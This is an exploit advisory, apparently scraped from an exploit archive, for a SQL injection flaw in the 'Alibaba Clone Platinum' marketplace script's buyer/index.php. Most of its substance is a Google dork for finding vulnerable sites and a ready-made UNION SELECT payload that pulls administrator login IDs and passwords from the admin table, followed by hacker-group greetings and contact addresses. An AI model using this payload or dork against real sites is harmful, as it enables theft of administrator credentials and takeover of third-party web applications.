扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 |
# Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability # Author: GuN # Published: 2010-14-05 # Verified: yes ........../¯¯/).................(\¯¯\.......... ........./¯.//....................\\.¯\......... ......../..//.........GuN........\\..\........ ../´¯<code>/' /´</code>\...WJA-TEAM../´<code>\ '</code>´¯\... ./ '/ / / /¨/¯\................./¯\¨\ \ \ \' \. ( '( ´ ´ ¯\/'' )................( ''/\¯ <code> </code> )' ) ----------------------------------------------------------------------- Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability ----------------------------------------------------------------------- Author: GuN Location: Tunisia - Tunis - Lycée el Omrane Time Zone : GMT +1:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Alibaba Clone Platinum Vendor: http://www.alibabaclone.com/ Price : $699 USD Google Dork : allinurl:buyer/index.php?ProductID= Overview:B2B trading Marketplace Script clone of alibaba Marketplace script is a wonderful solution to launch your own business to business and b2c site. Script is packed with lot of features to provide a very sound foundation to your trading portal site. Exploit: ~~~~~~~ -22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin-- SQLi GuN: ~~~~~~~ http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID= GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis <3 Inter<==> Volc4n0 <==> Vbspiders.com Contact: XGuN@Hacker.Ps ~~~~ XGuN@ViP.Cn ~~~~ |
体验盒子
